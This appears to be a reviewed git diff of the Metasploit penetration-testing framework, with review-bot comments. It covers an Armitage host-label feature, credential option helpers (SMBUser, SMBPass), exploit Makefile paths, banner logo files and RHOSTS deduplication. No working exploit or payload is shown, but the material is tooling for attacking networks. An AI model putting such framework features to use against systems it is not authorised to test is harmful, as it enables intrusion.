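		String name = desc.getName();
		if (!"java.util.HashMap".equals(name) && !"java.lang.String".equals(name))
			throw new InvalidClassException("unexpected class in label data: " + name);
		return super.resolveClass(desc);
	}
};
/* … unchanged: readObject, close, labels.putAll … */
```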
@@ -192,8 +293,8 @@ public class DatabaseImpl implements RpcConnection { /* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting and limit the size of the final result there. */ - int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000; - int limit2 = rFilter == null && oFilter == null ? maxservices : 100000; + int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000; + int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000; temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid); @@ -235,7 +336,7 @@ public class DatabaseImpl implements RpcConnection { result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices)); } else if (methodName.equals("db.hosts")) { - result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts)); + result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts))); } else { result.put(methodName.substring(3), executeQuery(query)); @@ -332,6 +433,7 @@ public class DatabaseImpl implements RpcConnection { rFilter = null; oFilter = null; + lFilter = null; List hosts = new LinkedList(); List srvcs = new LinkedList(); @@ -385,6 +487,11 @@ public class DatabaseImpl implements RpcConnection { oFilter = (values.get("os") + "").toLowerCase().split(",\\s*"); } + /* label filter */ + if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) { + lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*"); + } + if (hosts.size() == 0) { hFilter = null; } 
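Review bot: `(values.get("labels") + "").length() > 0` in the new label-filter branch turns a present-but-null value into the four-character string `"null"`, so a workspace whose `labels` entry arrives as null (likely for workspaces saved before this change, see the `workspaces()` hunk in workspaces.sl) becomes a filter that hides every host whose label does not contain "null". Test the object first: `Object l = values.get("labels"); if (l != null && l.toString().trim().length() > 0) { lFilter = l.toString().toLowerCase().split(",\\s*"); }`. The `os` line just above uses the same `+ ""` idiom, so `oFilter` presumably has the same exposure. `execute` continues outside the hunk.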
@@ -406,6 +513,31 @@ public class DatabaseImpl implements RpcConnection { result.put("rows", new Integer(stmt.executeUpdate())); return result; } + else if (methodName.equals("db.report_labels")) { + /* merge out global label data */ + Map values = (Map)params[0]; + mergeLabels(values); + + /* delete our saved label data */ + executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'"); + + /* serialize our notes data */ + ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128); + ObjectOutputStream handle = new ObjectOutputStream(store); + handle.writeObject(labels); + handle.close(); + store.close(); + + String data = Base64.encode(store.toByteArray()); + + /* save our label data */ + PreparedStatement stmt = null; + stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)"); + stmt.setString(1, data); + stmt.executeUpdate(); + + return new HashMap(); + } else if (methodName.equals("db.report_host")) { Map values = (Map)params[0]; String host = values.get("host") + ""; diff --git a/external/source/armitage/src/msf/RpcCacheImpl.java b/external/source/armitage/src/msf/RpcCacheImpl.java index c28e037e91..4a1d7e85cb 100644 --- a/external/source/armitage/src/msf/RpcCacheImpl.java +++ b/external/source/armitage/src/msf/RpcCacheImpl.java @@ -106,6 +106,8 @@ public class RpcCacheImpl implements Runnable { key.append(temp.get("ports")); key.append(";"); key.append(temp.get("session")); + key.append(";"); + key.append(temp.get("labels")); return key.toString(); } diff --git a/external/source/armitage/src/table/NetworkTable.java b/external/source/armitage/src/table/NetworkTable.java index 014fed3a10..2d7590db0e 100644 --- a/external/source/armitage/src/table/NetworkTable.java +++ b/external/source/armitage/src/table/NetworkTable.java 
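Review bot: The `db.report_labels` branch runs the `DELETE` and the `INSERT` as two independent auto-committed statements, so a failure between them (or two clients labelling at the same time) leaves the persisted label set empty or with one update silently overwriting the other, and the `PreparedStatement` is never closed. Run both in one transaction — `db.setAutoCommit(false)`, execute, `db.commit()`, `db.rollback()` in the catch, `stmt.close()` in a `finally` — or use a single `UPDATE` when a row already exists. `mergeLabels` also mutates the shared `labels` HashMap while `addLabels` may be iterating it for another request; if `execute` can be entered from more than one thread (not visible here), guard both with `synchronized (labels)`. The value stored is a base64 Java-serialized map that `loadLabels` reads back, so a text format such as `Properties` would also make the read side safe without a class whitelist.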
@@ -52,7 +52,7 @@ public class NetworkTable extends JComponent implements ActionListener { public NetworkTable(Properties display) { this.display = display; - model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256); + model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256); table = new ATable(model); TableRowSorter sorter = new TableRowSorter(model); sorter.toggleSortOrder(1); @@ -79,12 +79,13 @@ public class NetworkTable extends JComponent implements ActionListener { }; sorter.setComparator(1, hostCompare); - sorter.setComparator(3, hostCompare); + sorter.setComparator(4, hostCompare); table.setRowSorter(sorter); table.setColumnSelectionAllowed(false); table.getColumn("Address").setPreferredWidth(125); + table.getColumn("Label").setPreferredWidth(125); table.getColumn("Pivot").setPreferredWidth(125); table.getColumn(" ").setPreferredWidth(32); table.getColumn(" ").setMaxWidth(32); @@ -95,7 +96,7 @@ public class NetworkTable extends JComponent implements ActionListener { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) { JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col); - if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) { + if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) { component.setFont(component.getFont().deriveFont(Font.BOLD)); } else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) { 
@@ -252,16 +253,17 @@ public class NetworkTable extends JComponent implements ActionListener { public void addActionForKeySetting(String key, String dvalue, Action action) { } - public Object addNode(String id, String label, Image image, String tooltip) { + public Object addNode(String id, String label, String description, Image image, String tooltip) { if (id == null || label == null) return null; HashMap map = new HashMap(); map.put("Address", id); - if (label.indexOf(id) > -1) - label = label.substring(id.length()); - map.put("Description", label); + if (description.indexOf(id) > -1) + description = description.substring(id.length()); + map.put("Label", label); + map.put("Description", description); map.put("Tooltip", tooltip); map.put("Image", image); map.put(" ", tooltip); diff --git a/external/source/armitage/src/ui/ATable.java b/external/source/armitage/src/ui/ATable.java index bc1569659c..ce80216dbd 100644 --- a/external/source/armitage/src/ui/ATable.java +++ b/external/source/armitage/src/ui/ATable.java @@ -26,6 +26,12 @@ public class ATable extends JTable { specialitems.add("WORDLIST"); specialitems.add("SESSION"); specialitems.add("REXE"); + specialitems.add("EXE::Custom"); + specialitems.add("EXE::Template"); + specialitems.add("USERNAME"); + specialitems.add("PASSWORD"); + specialitems.add("SMBUser"); + specialitems.add("SMBPass"); return new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { diff --git a/external/source/armitage/src/ui/ZoomableImage.java b/external/source/armitage/src/ui/ZoomableImage.java index 346438e15e..466f2c56d3 100644 --- a/external/source/armitage/src/ui/ZoomableImage.java +++ b/external/source/armitage/src/ui/ZoomableImage.java @@ -54,6 +54,8 @@ public class ZoomableImage extends JLabel { check(ev); } }); + + setHorizontalAlignment(SwingConstants.CENTER); } protected void updateIcon() { 
diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index 5ea39884dd..c1e03e579b 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,32 @@ Armitage Changelog ================== +23 Jan 13 (tested against msf 16351) +--------- +- Added helpers to set EXE::Custom and EXE::Template options. +- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts +- Cleaned up Armitage -> SOCKS Proxy job management code. The code to + check if a proxy server is up was deadlock prone. Removed it. +- Starting SOCKS Proxy module now opens a tab displaying the module + start process. An event is posted to the event log too. +- Created an option helper to select credentials for SMBUser, SMBPass, + USERNAME, and PASSWORD. +- Added a feature to label hosts. A label will show up in its own column + in table view or below all info in graph view. Any team member may + change a label through [host] -> host -> Set Label. You may also use + dynamic workspaces to show hosts with certain labels attached. +- Fixed bad things happening when connecting Armitage to 'localhost' and + not '127.0.0.1'. +- Screenshots and Webcam shots are now centered in their tab. +- Added an alternate .bat file to start msfrpcd on Windows in the + Metasploit 4.5 installer's environment. +- Added a color-style for [!] warning messages + +Cortana Updates (for scripters) +-------- +- &handler function now works as advertised. +- Cortana now avoids use of core.setg + 4 Jan 13 (tested against msf 16252) -------- - Added a helper to set REXE option diff --git a/external/source/exploits/cve-2012-5076_2/Makefile b/external/source/exploits/cve-2012-5076_2/Makefile index e93911b8ed..1a84229b80 100755 --- a/external/source/exploits/cve-2012-5076_2/Makefile +++ b/external/source/exploits/cve-2012-5076_2/Makefile 
@@ -11,8 +11,8 @@ CLASSES = \ all: $(CLASSES:.java=.class) install: - mv Exploit.class ../../../../data/exploits/cve-2013-0422/ - mv B.class ../../../../data/exploits/cve-2013-0422/ + mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/ + mv B.class ../../../../data/exploits/cve-2012-5076_2/ clean: rm -rf *.class diff --git a/external/source/exploits/cve-2012-5088/Makefile b/external/source/exploits/cve-2012-5088/Makefile index abc39b7a2c..226cdcd65c 100755 --- a/external/source/exploits/cve-2012-5088/Makefile +++ b/external/source/exploits/cve-2012-5088/Makefile @@ -9,8 +9,8 @@ CLASSES = \ all: $(CLASSES:.java=.class) install: - mv Exploit.class ../../../../data/exploits/cve-2013-0422/ - mv B.class ../../../../data/exploits/cve-2013-0422/ + mv Exploit.class ../../../../data/exploits/cve-2012-5088/ + mv B.class ../../../../data/exploits/cve-2012-5088/ clean: rm -rf *.class diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index a8cfe55431..7e0bc736ba 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -679,8 +679,8 @@ class DBManager # In the case of multi handler we cannot yet determine the true # exploit responsible. But we can at least show the parent versus # just the generic handler: - if session and session.via_exploit == "exploit/multi/handler" - sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] + if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] + sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] end s = ::Mdm::Session.new(sess_data) 
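Review bot: The guard `session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']` is now spelled out three times (here and in the two db.rb hunks at `@@ -696,9 +696,9 @@` and `@@ -720,7 +720,7 @@`), each with `and`, which the style guide avoids in boolean conditions because of its low precedence. Compute it once where `sess_data` is built, e.g. `parent_module = sess_data[:datastore]['ParentModule'] if session && session.via_exploit == "exploit/multi/handler"`, and test `parent_module` at the three sites if they share a method (the enclosing method continues outside the hunk, so I cannot confirm that here).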
@@ -696,9 +696,9 @@ class DBManager mod = framework.modules.create(session.via_exploit) - if session.via_exploit == "exploit/multi/handler" - mod_fullname = sess_data[:datastore]['ParentModule'] - mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] + mod_fullname = sess_data[:datastore]['ParentModule'] + mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name else mod_name = mod.name mod_fullname = mod.fullname @@ -720,7 +720,7 @@ class DBManager vuln = framework.db.report_vuln(vuln_info) - if session.via_exploit == "exploit/multi/handler" + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] via_exploit = sess_data[:datastore]['ParentModule'] else via_exploit = session.via_exploit diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index c30dc8cdf6..5f53bef07e 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb 
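Review bot: In the -696 hunk, `::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name` still raises NoMethodError when the lookup returns nil (for example when the module cache has not been built yet); the new guard only checks that `ParentModule` is set in the datastore, not that it resolves to a cached module. Consider `detail = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname)` followed by `mod_name = detail ? detail.name : mod_fullname`. The same `via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']` condition now appears three times (also in the -679 and -720 hunks); a small private helper returning the effective parent module would keep them from drifting. The enclosing method starts and ends outside these hunks.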
@@ -10,301 +10,52 @@ module Ui module Banner Logos = - [ -%Q{ -%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc - - Trace program: running - - wake up, Neo... - %bldthe matrix has you%clr - follow the white rabbit. - - knock, knock, Neo. - - (`. ,-, - ` `. ,;' / - `. ,'/ .' - `. X /.' - .-;--''--.._` ` ( - .' / ` - , ` ' Q ' - , , `._ \\ - ,.| ' `-.;_' - : . ` ; ` ` --,.._; - ' ` , ) .' - `._ , ' /_ - ; ,''-,;' ``- - ``-..__``--` -%clr}, - -%Q{%whi - _---------. - .' ####### ;." - .---,. ;@ @@`; .---,.. -." @@@@@'.,'@@ @@@@@',.'@@@@ ". -'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; - `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' - "--'.@@@ -.@ @ ,'- .'--" - ".@' ; @ @ `. ;' - |@@@@ @@@ @ . - ' @@@ @@ @@ , - `.@@@@ @@ . - ',@@ @ ; _____________ - ( 3 C ) /|___ / Metasploit! \\ - ;@'. __*__,." \\|--- \\_____________/ - '(.,...."/ -%clr}, -' -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% -%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% -%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% -%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% -%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -', -' - _ _ -/ \ /\ __ _ __ /_/ 
__ -| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ -| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| -|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ - |/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\ -', -%Q{ -%whiIIIIII %reddTb.dTb%clr _.---._ -%whi II %red4' v 'B%clr .'"".'/|\`.""'. -%whi II %red6. .P%clr : .' / | \ `. : -%whi II %red'T;. .;P'%clr '.' / | \ `.' -%whi II %red'T; ;P'%clr `. / | \ .' -%whiIIIIII %red'YvP'%clr `-.__|__.-' - -I love shells --egypt -}, -' - , , - / \ - ((__---,,,---__)) - (_) O O (_)_________ - \ _ / |\ - o_o \ M S F | \ - \ _____ | * - ||| WW||| - ||| ||| -', -' -# cowsay++ - ____________ -< metasploit > - ------------ - \ ,__, - \ (oo)____ - (__) )\ - ||--|| * -', - - -'%clr - ______________________________________________________________________________ -| | -| %bld3Kom SuperHack II Logon%clr | -|______________________________________________________________________________| -| | -| | -| | -| User Name: [ %redsecurity%clr ] | -| | -| Password: [ ] | -| | -| | -| | -| %bld[ OK ]%clr | -|______________________________________________________________________________| -| | -|______________________________________________________________________________| -%clr -', - - -'%clr - ______________________________________________________________________________ -| | -| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr | -|______________________________________________________________________________| - %yel\%clr %yel/%clr %yel/%clr - %yel\%clr . %yel/%clr %yel/%clr x - %yel\%clr %yel/%clr %yel/%clr - %yel\%clr %yel/%clr + %yel/%clr - %yel\%clr + %yel/%clr %yel/%clr - * %yel/%clr %yel/%clr - %yel/%clr . %yel/%clr - X %yel/%clr %yel/%clr X - %yel/%clr %red###%clr - %yel/%clr %red# %bld%%clr%red #%clr - %yel/%clr %red###%clr - . %yel/%clr - . %yel/%clr . %red*%clr . 
- %yel/%clr - * - + %red*%clr - - %bld^%clr -#### __ __ __ ####### __ __ __ #### -#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr #### -################################################################################ -################################################################################ -# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # -################################################################################ -%clr -', - - -' -%clr%whi -Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f -EFLAGS: 00010046 -eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 -esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 -ds: 0018 es: 0018 ss: 0018 -Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) - -%bld -Stack: 90909090990909090990909090 - 90909090990909090990909090 - 90909090.90909090.90909090 - 90909090.90909090.90909090 - 90909090.90909090.09090900 - 90909090.90909090.09090900 - .......................... - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - ccccccccc................. - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - .................ccccccccc - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - .......................... - ffffffffffffffffffffffffff - ffffffff.................. - ffffffffffffffffffffffffff - ffffffff.................. - ffffffff.................. - ffffffff.................. -%clr - -%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr -Aiee, Killing Interrupt handler -%redKernel panic: Attempted to kill the idle task! 
-In swapper task - not syncing -%clr -', -' -%clr -%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr -%bluMMMMMMMMMMM MMMMMMMMMM%clr -%bluMMMN$ vMMMM%clr -%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr -%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr -%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr -%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr -%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr -%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr -%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr -%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr -%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr -%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr -%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr -%clr -', -' -%clr ######## # - ################# # - ###################### # - ######################### # - ############################ - ############################## - ############################### - ############################### - ############################## - # ######## # - %red##%clr %red###%clr #### ## - ### ### - #### ### - #### ########## #### - ####################### #### - #################### #### - ################## #### - ############ ## - ######## ### - ######### ##### - ############ ###### - ######## ######### - ##### ######## - ### ######### - ###### ############ - ####################### - # # ### # # ## - ######################## - ## ## ## ## -%clr -', -%Q{ - %whi+-------------------------------------------------------+ - %whi| METASPLOIT by Rapid7 | - %whi+---------------------------+---------------------------+ - %whi| %blu__________________ %whi| | - %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi| - %whi| 
%blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi| - %whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi| - %whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi| - %whi| %blu// \\\\ %whi| %grn|______________________\\ %whi| - %whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi| - %whi| %blu// \\\\ %whi| %grn********************* %whi| - %whi+---------------------------+---------------------------+ - %whi| o O o | %yel\\'\\/\\/\\/'/ %whi| - %whi| o O | %yel)%whi======%yel( %whi| - %whi| o | %yel.' %whiLOOT %yel'. %whi| - %whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi| - %whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi| - %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| - %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| - %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| - %whi+---------------------------+---------------------------+%clr - %clr -},] - - - + %w{ + wake-up-neo.txt + cow-head.txt + r7-metasploit.txt + figlet.txt + i-heart-shells.txt + branded-longhorn.txt + cowsay.txt + 3kom-superhack.txt + missile-command.txt + null-pointer-deref.txt + metasploit-shield.txt + ninja.txt + workflow.txt + } # # Returns a random metasploit logo. # + + def self.readfile(fname) + base = File.expand_path(File.dirname(__FILE__)) + pathname = File.join(base, "logos", fname) + fdata = "<< Missing banner: #{fname} >>" + begin + raise ArgumentError unless File.readable?(pathname) + raise ArgumentError unless File.stat(pathname).size < 4096 + fdata = File.open(pathname) {|f| f.read f.stat.size} + rescue SystemCallError, ArgumentError + nil + end + return fdata + end + def self.to_s if ENV['GOCOW'] - case rand(2) + case rand(3) when 0 - Logos[1] + self.readfile Logos[1] when 1 - Logos[5] + self.readfile Logos[5] + when 2 + self.readfile Logos[6] end else - Logos[rand(Logos.length)] + self.readfile Logos[rand(Logos.length)] end end 
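Review bot: `self.readfile` silently returns the placeholder `<< Missing banner: #{fname} >>` on any failure, including a logo that exceeds the 4096-byte cap, and nothing documents either limit; add a comment above the method such as `# Reads a logo from lib/msf/ui/logos; returns a placeholder string if the file is unreadable or larger than 4096 bytes.` The `nil` in the `rescue SystemCallError, ArgumentError` branch is dead because `fdata` already holds the fallback, and `File.open(pathname) {|f| f.read f.stat.size}` is equivalent to `File.read(pathname)`. The `readable?`/`stat`/`open` sequence makes three separate filesystem calls on the same path; doing the size check on `f.stat` inside a single `File.open` block removes the gap between checks, though for a fixed in-tree path this is tidiness rather than a risk. The `Logos[1]`, `Logos[5]` and `Logos[6]` indices in `to_s` depend on the order of the `%w{}` list, which deserves a comment so a later reorder does not silently change the GOCOW set.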
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index c590424829..b16fe1007b 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -205,6 +205,7 @@ class Db mode = :search delete_count = 0 + rhosts = [] host_ranges = [] search_term = nil @@ -241,7 +242,6 @@ class Db output = args.shift when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi @@ -280,11 +280,6 @@ class Db range.each do |address| host = framework.db.find_or_create_host(:host => address) print_status("Time: #{host.created_at} Host: host=#{host.address}") - if set_rhosts - # only unique addresses - addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) - end end end return @@ -323,7 +318,7 @@ class Db tbl << columns if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end if mode == :delete host.destroy @@ -344,9 +339,11 @@ class Db # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} hosts") if delete_count > 0 } +## +## end def cmd_services_help @@ -366,10 +363,11 @@ class Db default_columns = ::Mdm::Service.column_names.sort default_columns.delete_if {|v| (v[-2,2] == "id")} - host_ranges = [] - port_ranges = [] + host_ranges = [] + port_ranges = [] + rhosts = [] delete_count = 0 - search_term = nil + search_term = nil # option parsing while (arg = args.shift) @@ -420,7 +418,6 @@ class Db output_file = ::File.expand_path(output_file) when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi 
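Review bot: The two `##` lines inserted after the closing `}` of `cmd_hosts` in the -344 hunk look like leftover scratch comments and should be dropped before merge. Hoisting `rhosts = []` to the top of each command and deduplicating once with `rhosts.uniq` is a sound simplification, but the -363 hunk also rewrites the alignment of `host_ranges`, `port_ranges` and `search_term` with no code change, which adds noise to an otherwise behavioural diff. The enclosing methods start and end outside these hunks.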
@@ -508,7 +505,7 @@ class Db tbl << columns if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end if (mode == :delete) @@ -529,7 +526,7 @@ class Db # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} services") if delete_count > 0 } @@ -680,6 +677,7 @@ class Db host_ranges = [] port_ranges = [] + rhosts = [] svcs = [] search_term = nil @@ -733,7 +731,6 @@ class Db end when "-R" set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi when "-u","--user" @@ -828,7 +825,7 @@ class Db end if set_rhosts addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end creds_returned += 1 end @@ -842,7 +839,7 @@ class Db print_status("Wrote services to #{output_file}") end - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}." } end @@ -873,6 +870,7 @@ class Db set_rhosts = false host_ranges = [] + rhosts = [] search_term = nil while (arg = args.shift) @@ -896,7 +894,6 @@ class Db types = typelist.strip().split(",") when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi when '-h','--help' @@ -954,7 +951,7 @@ class Db msg << " host=#{note.host.address}" if set_rhosts addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr unless rhosts.include?(addr) + rhosts << addr end end if (note.service) 
@@ -971,7 +968,7 @@ class Db # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0 } @@ -1476,7 +1473,7 @@ class Db print_error("The database is not connected") return end - + print_status("Purging and rebuilding the module cache in the background...") framework.threads.spawn("ModuleCacheRebuild", true) do framework.db.purge_all_module_details @@ -1707,4 +1704,3 @@ end end end end - diff --git a/lib/msf/ui/logos/3kom-superhack.txt b/lib/msf/ui/logos/3kom-superhack.txt new file mode 100644 index 0000000000..e1fda38981 --- /dev/null +++ b/lib/msf/ui/logos/3kom-superhack.txt @@ -0,0 +1,19 @@ +%clr + ______________________________________________________________________________ +| | +| %bld3Kom SuperHack II Logon%clr | +|______________________________________________________________________________| +| | +| | +| | +| User Name: [ %redsecurity%clr ] | +| | +| Password: [ ] | +| | +| | +| | +| %bld[ OK ]%clr | +|______________________________________________________________________________| +| | +| http://metasploit.pro | +|______________________________________________________________________________|%clr diff --git a/lib/msf/ui/logos/branded-longhorn.txt b/lib/msf/ui/logos/branded-longhorn.txt new file mode 100644 index 0000000000..2b49662ab4 --- /dev/null +++ b/lib/msf/ui/logos/branded-longhorn.txt @@ -0,0 +1,9 @@ + , , + / \ + ((__---,,,---__)) + (_) O O (_)_________ + \ _ / |\ + o_o \ M S F | \ + \ _____ | * + ||| WW||| + ||| 